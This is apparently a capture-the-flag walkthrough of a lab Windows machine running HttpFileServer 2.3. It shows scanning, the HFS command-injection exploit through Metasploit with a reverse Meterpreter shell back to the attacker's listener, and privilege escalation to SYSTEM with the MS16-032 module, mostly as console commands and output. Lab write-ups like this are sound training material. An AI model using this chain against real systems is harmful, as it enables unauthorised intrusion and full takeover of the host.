This box differed from all the other ones I've done so far in the sense that they want you to explicitly use the Metasploit framework.
Running nmap:
sudo nmap -sC -sV 10.129.34.87 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS /
THe machine is running version 2.3 of HttpFileServer. Coming from the last box, I've come to the realization searching for vulnerabilites from the get-go does give me pointers which are helpful.
searchsploit HttpFileServer ---------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------- --------------------------------- Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py ---------------------------------------------- --------------------------------- Shellcodes: No Results
This is what the main page looks like. There are no default credentials for HFS. There's 12 year old (as of 2026) CVE for the machine. The input for the findMacroMarker function inside of parserLib.pas is not sanitized properly - if we insert a null-byte followed by anything, we can write in any command we want, like a reverse shell with HFS' {.exec|cmd.exe /c example}. For this, metasploit can be used (as other PoCs just refused to work), we just need to configure the required parameters of RHOST, RPORT, LHOST, LPORT. Once that's done, the exploit can be run.
[msf](Jobs:0 Agents:0) exploit(windows/http/rejetto_hfs_exec) >> run ... [*] Meterpreter session 1 opened (10.10.15.55:4444 -> 10.129.34.87:49178) at 2026-05-13 12:48:35 -0500 (Meterpreter 1)(C:\Users\kostas\Desktop) >
This gives us a meterpreter shell as kostas!
Looking for ways to privesc:
(Meterpreter 1)(C:\Users\kostas\Desktop) > sysinfo Computer : OPTIMUM OS : Windows Server 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : el_GR Domain : HTB Logged On Users : 2 Meterpreter : x86/windows
Since HFS is a 32-bit process, the meterpreter it spawned was also 32-bit. The mismatch might result in privesc methods not working properly. I changed to 64-bit via a simple migration.
(Meterpreter 1)(C:\Users\kostas\Desktop) > migrate -N explorer.exe [*] Migrating from 3016 to 1484... [*] Migration completed successfully. (Meterpreter 1)(C:\Windows) > sysinfo ... Meterpreter : x64/windows
Following this, since this box has (supposedly) been reliant on the Metasploit framework, I'll use msfconsole's local_exploit_suggester to find ways to privesc:
[*] 10.129.34.87 - Valid modules for session 1: ============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable. 2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable. 3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. 4 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable. 5 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable. 6 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable. 7 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected! 8 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected! 9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated. 10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
For what I need, which is system access, MS16_032 does the trick.
[msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> set lhost tun0 lhost => 10.10.15.55 [msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> set session 1 session => 1 [msf](Jobs:0 Agents:1) exploit(windows/local/ms16_032_secondary_logon_handle_privesc) >> run ... [*] Meterpreter session 2 opened (10.10.15.55:4444 -> 10.129.34.87:49180) at 2026-05-13 13:40:19 -0500 (Meterpreter 2)(C:\Windows) >
With this, we get root! Good luck to anyone else attempting this box!